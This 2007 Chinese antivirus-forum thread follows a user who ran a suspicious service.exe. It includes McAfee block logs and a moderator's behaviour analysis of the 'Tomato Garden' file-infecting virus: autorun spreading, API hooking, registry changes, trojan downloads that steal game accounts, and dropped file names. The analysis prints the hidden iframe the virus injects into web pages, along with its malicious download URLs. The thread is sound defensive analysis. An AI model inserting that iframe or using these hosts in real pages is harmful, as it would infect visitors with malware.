查看: 4221|回复: 19
收起左侧

番茄花园的service.exe??

[复制链接]
yager 该用户已被删除
发表于 2007-6-15 22:38:09 | 显示全部楼层 |阅读模式
不小心运行了一下 。。。

不知道咖啡有没有全部拦截 。。。


2007-6-15        20:55:24        已由访问保护规则禁止         I:\service.exe        C:\WINDOWS\service.exe        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件        已阻止的操作: 创建
2007-6-15        20:55:25        已由访问保护规则禁止         I:\service.exe        \REGISTRY\USER\S-1-5-21-1078081533-606747145-682003330-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\load        通用最大保护:禁止将程序注册为自动运行        已阻止的操作: 创建
小邪邪
发表于 2007-6-15 22:41:04 | 显示全部楼层
默认的规则确实是力度不够,那里面的排除也很有问题
yager 该用户已被删除
 楼主| 发表于 2007-6-15 22:43:48 | 显示全部楼层
啊。。我好像用的那个加强版。。

到底哪个更安全点。。
小邪邪
发表于 2007-6-15 22:49:43 | 显示全部楼层
加强版里的自定义规则都够厉害了,通常默认的规则很少派上用场

怎么这里只见默认规则的日志?其它的呢?
yager 该用户已被删除
 楼主| 发表于 2007-6-15 22:50:30 | 显示全部楼层
估计这个病毒就这点动作吧。。没见到触发其他规则。。那个文件删除了。。要不然发过来测试一下
小邪邪
发表于 2007-6-15 22:53:16 | 显示全部楼层
不可能在不触犯强规则的情况下却能够触到默认规则的

会不会是有的规则没开?
yager 该用户已被删除
 楼主| 发表于 2007-6-15 22:55:30 | 显示全部楼层
我基本上都开了

端口的口开了

86没开
yager 该用户已被删除
 楼主| 发表于 2007-6-15 22:58:03 | 显示全部楼层
样本来了

我就打开过service这个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yager 该用户已被删除
 楼主| 发表于 2007-6-15 23:13:05 | 显示全部楼层
版主呢 。。我刷了半天了。。等你的回复。。
小邪邪
发表于 2007-6-15 23:15:56 | 显示全部楼层
试是试了,防也防住了





这个东西很毒:

主要破坏功能有:
1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
2.感染html asp 等文件 插入恶意代码
3.通过双击磁盘启动
4.下载木马,盗取网游帐号
5.修改注册表 使系统无法显示隐藏文件
6.通过hook API 函数 导致任务管理器中 无法看见其进程
分析报告如下:
File:rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
病毒行为分析:
1.rising.exe运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

2.释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动

3.感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园(被感染的exe运行后 会释放risng.exe和一个和被感染文件同名的扩展名为eve的文件,其实那个eve的文件就是被感染文件的源文件)

4.感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
http://web.yulett.cn/count.htm下载的是http://www.xxxxsou8.cn/update3.exe
经检测也是 rising.exe

5.修改系统时间 随机把年份往前调 月,日不变

6.修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示隐藏文件

rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏

7.使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹

由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
C:\WINDOWS\system32\buchehuo.exe(创建了服务inetsvr)

C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

C:\WINDOWS\cnzz.exe
C:\WINDOWS\system32\cnzz.dll

C:\WINDOWS下分别释放 类似SysXXXX的文件夹 里面一般有两个文件 一个是svchost.exe
一个hook.dll
XXXX(代表数字或者字母的组合)

临时文件夹下 释放upxdnd.exe和upxdnd.dll

就是能防住它也不代表什么,不要试毒(否则早晚得出事)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1技术 +1 收起 理由
麦田守望者 + 1 感谢解答: )

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-24 07:16 , Processed in 0.122414 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表